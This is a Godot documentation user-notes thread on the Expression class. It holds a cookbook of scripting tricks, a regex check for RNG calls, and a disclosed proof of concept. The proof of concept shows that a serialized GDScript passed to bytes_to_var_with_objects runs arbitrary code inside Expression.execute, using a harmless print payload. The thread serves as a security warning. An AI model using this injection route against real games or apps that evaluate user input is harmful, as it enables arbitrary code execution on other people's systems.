### DISCUSSION TITLE
tutorials/scripting/evaluating_expressions

### DISCUSSION THREAD

**Discussion by giscus** [godotengine/godot-docs-user-notes#177] [User-contributed notes]
# tutorials/scripting/evaluating_expressions

Godot provides an Expression class you can use to evaluate expressions. An expression can be: A mathematical expression such as(2 + 4) * 16/4.0., A built-in method call like deg_to_rad(90)., A meth...

https://docs.godotengine.org/en/stable/tutorials/scripting/evaluating_expressions.html

**Comment by Agecaf** [comment]
So I like Expressions. There's lots of stuff you can do that you might not have expected is possible at first glance. Here's a little cookbook. In these examples, `self` is a `Node2D`, and `expr` is a new `Expression`. I've added a comment to what the equivalent code would be in GDScript.
### Assignment
An expression like `"x = 2"` is not allowed, however through `Object.set` and `Object.set_indexed` we can get around this.
```gdscript
# position.x = 100
expr.parse("set_indexed(\"position:x\", 100)")
expr.execute([], self)
```
### Multiple function calls
If you want to call two or more methods in one expression, you can put them inside an array.
```gdscript
# print(0); print(1)
expr.parse("[print(0), print(1)]")
expr.execute()
```
This is something you can't do in regular GDScript because `print` returns `void`, however inside `Expression` it returns `null` instead...

### Conditional value
The ternary if/else operator does not seem to work as expected inside `Expression` at the moment. In the meantime, you can use the fact that `int(false)` is `0` and `int(true)` is `1`;
```gdscript
# "old enough" if (age >= 18) else "too young"
expr.parse("[\"too young\", \"old enough\"][int(age >= 18)]", ["age"])
expr.execute([12]) # too young
epxr.execute([22]) # old enough
```
### Conditional execution
If you have the functions to call within the base instance, you can conditionally execute function calls.
```gdscript
# hide() if visible else show()
expr.parse("[show, hide][int(visible)].call()")
expr.execute([], self)
```

**Reply by nathancarter** [reply]
Take care with the "conditional value" trick.  If the expressions in the arrays have side effects, both will be evaluated before choosing one with the subscript index.  This is different than how the ternary operator behaves.

**Reply by Calinou** [reply]
The array-based syntax also has a greater performance impact, since it needs to construct the array and evaluate *all* its items. A Dictionary-based equivalent would be even slower, as dictionaries are slower to create and query than arrays.

**Reply by JamesWeishausModern** [reply]
you could also write a function within the expression's base_instance for handling conditionals.
```gdscript
func branch(condition : bool, then : Callable, otherwise = null):
    if condition: 
        then.call()
    elif otherwise != null && otherwise is Callable: 
        otherwise.call()

func call_exp():
    expr.parse("branch(is_riding_firetruck(), firetruck.bind(riders), ambulance)", ["riders"])
    expr.execute([4], self)

func firetruck(riders : int): pass
func ambulance(): pass
```

**Comment by Thorgrimar** [comment]
Even if you use `expression.execute([], null)` the user could use the `seed` or `randomize()` functions in the command to modify the Random Number Generator.
Here is a script to check if a command String uses these "dangerous" functions of the Global Scope :
```gdscript
func contains_forbidden_rng_calls(command: String) -> bool:
	# Pattern matches e.g. "randomize()" or "randomize ( )" and "seed(123)" etc.
	var patterns := ["randomize\\s*\\(", "seed\\s*\\("]
	for p in patterns:
		var re := RegEx.new()
		var compile_err := re.compile(p)
		if re.search(command) != null:
			return true
	return false
```

**Reply by nonchip** [reply]
it's actually worse: as the last section says:

> All methods in the Global Scope are available in the Expression class, even if no base instance is bound to the expression.

which means `bytes_to_var_with_objects` is available. give that a serialized `GDScript` with a `_static_init` and you're running arbitrary GDScript code in `Expression.execute`.

this should really have a bigger warning considering how often I've seen people suggest "just use `Expression`, it's safe if you dont give it objects" when people ask for `eval`.

---

here's a proof of concept:

- run something like this to generate a (harmless) payload:
```gdscript
var s := GDScript.new()
s.source_code = "static func _static_init(): print(\"Hello!\")"
s.reload()
print("bytes_to_var_with_objects(", var_to_bytes_with_objects(s), ")")
```

- enter the payload in an expression (simulated here by hardcoding the string):
```gdscript
var e := Expression.new()
e.parse('bytes_to_var_with_objects([24, 0, 0, 0, 8, 0, 0, 0, 71, 68, 83, 99, 114, 105, 112, 116, 4, 0, 0, 0, 23, 0, 0, 0, 114, 101, 115, 111, 117, 114, 99, 101, 95, 108, 111, 99, 97, 108, 95, 116, 111, 95, 115, 99, 101, 110, 101, 0, 1, 0, 0, 0, 0, 0, 0, 0, 13, 0, 0, 0, 114, 101, 115, 111, 117, 114, 99, 101, 95, 110, 97, 109, 101, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 13, 0, 0, 0, 115, 99, 114, 105, 112, 116, 47, 115, 111, 117, 114, 99, 101, 0, 0, 0, 4, 0, 0, 0, 43, 0, 0, 0, 115, 116, 97, 116, 105, 99, 32, 102, 117, 110, 99, 32, 95, 115, 116, 97, 116, 105, 99, 95, 105, 110, 105, 116, 40, 41, 58, 32, 112, 114, 105, 110, 116, 40, 34, 72, 101, 108, 108, 111, 33, 34, 41, 0, 6, 0, 0, 0, 115, 99, 114, 105, 112, 116, 0, 0, 0, 0, 0, 0])')
e.execute()
```

- Watch the `print("Hello!")` happen

---

and even without that, the warning in the "base instance" section is incomplete:
>  allows referencing constants, member variables, and calling all methods defined in the script attached to the instance

it also allows accessing for example the script *itself* (through `Object.get_script()`), which gives *write* access to the source code (as used in the payload generation above)

**Reply by nathancarter** [reply]
Very nice explanations and important warnings.  The extremeness of the unsafety.
